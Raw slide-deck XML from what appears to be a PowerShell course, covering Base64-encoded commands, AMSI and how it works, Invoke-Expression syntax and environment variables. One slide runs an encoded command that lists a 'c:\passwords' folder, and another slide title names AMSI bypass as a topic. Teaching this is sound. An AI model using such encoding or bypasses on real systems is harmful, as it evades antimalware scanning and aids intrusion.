            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Start-Process “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>dir</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> “c:\passwords”” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0g</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="147A42"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>powershell.exe -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>encodedCommand</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ZABpAHIAIAAiAGMAOgBcAHAAYQBzAHMAdwBvAHIAZABzACIAIAA</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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15</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Format</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="870833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755576" y="2675467"/>
            <a:ext cx="7588365" cy="3450696"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" dirty="0" smtClean="0"/>
              <a:t>Bypass AMSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" cap="all" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>PENTEST LABORATORIES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t> [</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Raj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chandel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="3600" i="1" baseline="-25000" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" sz="3600"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16</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704037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entestlaboratories.files.wordpress.com/2021/05/amsi-powershell-flowchart-1.png?w=10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700808"/>
            <a:ext cx="6190141" cy="4878364"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>17</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>AMSI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-TW" altLang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Flowchart </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" cap="all" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>PENTEST </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" cap="all" baseline="-25000" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>LABORATORIES</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4065284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0.wp.com/blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhK04zHRArW2xEe2hBlsIL61s2_HTCNZ1zkIdWJseU9v1xL9wOrznbH3ZPQDtSRSPVLvhVnNB1pSZXMr6izoh2wetWhvCGhzV2pnbZIAzzhEQ2kZCVStITIAeH4wbFJSk2XhnnYfox6ONiRREtnK8vqQdCX5c-MSLOmjH_30yr7hvLHlYsFVByUVy_QoQ/s16000/1.png?w=640&amp;ssl=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604318"/>
            <a:ext cx="7053472" cy="3835326"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="投影片編號版面配置區 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>18</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>How AMSI Works </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Raj </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" u="sng" baseline="-25000" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>Chandel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0" smtClean="0"/>
              <a:t>]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" i="1" baseline="-25000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="54608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19</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4072920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buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Invoke-Expression</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      [-Command] &lt;String&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>      [&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0" err="1">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CommonParameters</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" dirty="0">
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt;]</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" b="1" dirty="0">
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="標題 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="338328"/>
            <a:ext cx="8229600" cy="1252728"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Syntax </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="投影片編號版面配置區 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{37515765-4925-4C39-843B-55AAF0368D7C}" type="slidenum">
              <a:rPr lang="zh-TW" altLang="en-US" smtClean="0"/>
              <a:t>2</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2285263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20</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53760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21</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429309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b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Environment variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>are dynamically named variables that describe the environment in which your programs run. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>and PowerShell use environment variables to store persistent information that affect system and process execution. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Unlike </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>PowerShell variables, environment variables are not subject to scope constraints.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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22</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Variables </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5442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The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" b="1" i="1" dirty="0">
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>Environment drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>is a flat namespace containing the environment variables specific to the current user's session. </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US"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23</a:t>
            </a:fld>
            <a:endParaRPr lang="zh-TW" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="標題 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0"/>
              <a:t>Environment </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" dirty="0" smtClean="0"/>
              <a:t>Drive </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Microsoft</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" i="1" baseline="-25000" dirty="0"/>
              <a:t>] </a:t>
            </a:r>
            <a:endParaRPr lang="zh-TW" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1703185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16024" y="2060848"/>
            <a:ext cx="8676456" cy="4248472"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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PS C:\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Users\FH</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&gt; get-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>psdrive</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Name           Used (GB)     Free (GB) Provider      Root  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>CurrentLocation</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           ---------     --------- --------      ----  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>---------------</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Alias                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Alias</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C                 255.50         22.66 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    C:\   </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    Users\FH</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Cert                                   Certificate   \</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D                  10.09        383.77 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>FileSystem</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    D:\</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E                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-TW" sz="1400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="147A42"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
